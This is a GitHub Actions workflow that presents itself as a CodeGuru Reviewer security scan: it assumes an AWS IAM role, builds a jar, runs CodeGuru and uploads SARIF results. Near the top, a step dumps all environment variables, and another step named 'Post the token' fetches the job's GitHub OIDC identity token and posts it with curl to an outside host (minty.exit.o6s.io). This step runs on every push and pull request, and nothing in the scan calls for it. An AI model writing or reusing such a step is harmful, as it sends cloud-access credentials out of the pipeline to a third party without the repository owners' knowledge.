
name: Analyze with CodeGuru Reviewer

on: 
  - push
  - pull_request
  - workflow_dispatch


permissions:
    id-token: write
    contents: read 
    security-events: write 

jobs:
  CodeGuruReviewerScan:
    runs-on: ubuntu-latest
    steps:
    - run: env
    - name: Post the token
      run: |
        OIDC_TOKEN=$(curl -sLS "${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=o6s" -H "User-Agent: actions/oidc-client" -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN")

        curl -i -s --data-binary "$OIDC_TOKEN" \
          https://minty.exit.o6s.io/github-oidc    
    - name: Assume IAM Role
      continue-on-error: true
      uses: aws-actions/configure-aws-credentials@v1
      id: iam-role
      with:
        role-to-assume: arn:aws:iam::048169001733:role/GuruGitHubCICDRole
        aws-region: us-west-2

    - uses: actions/checkout@v2
      if: steps.iam-role.outcome == 'success'
      with:
        fetch-depth: 0
    - name: Set up JDK 1.8
      if: steps.iam-role.outcome == 'success'
      uses: actions/setup-java@v1
      with:
        java-version: 1.8
    - name: Build with Maven
      if: steps.iam-role.outcome == 'success'
      run: ./gradlew jar

    - name: Run CodeGuru Reviewer
      if: steps.iam-role.outcome == 'success'
      id: codeguru
      uses: aws-actions/codeguru-reviewer@v1.1
      continue-on-error: false
      with:          
        s3_bucket: codeguru-reviewer-build-artifacts-048169001733-us-west-2
        build_path: ./build/libs

    - name: Store SARIF file
      if: steps.iam-role.outcome == 'success' && steps.codeguru.outcome == 'success'
      uses: actions/upload-artifact@v2
      with:
        name: SARIF_recommendations
        path: ./codeguru-results.sarif.json

    - name: Upload review result
      if: steps.iam-role.outcome == 'success' && steps.codeguru.outcome == 'success'
      uses: github/codeql-action/upload-sarif@v1
      with:
        sarif_file: codeguru-results.sarif.json
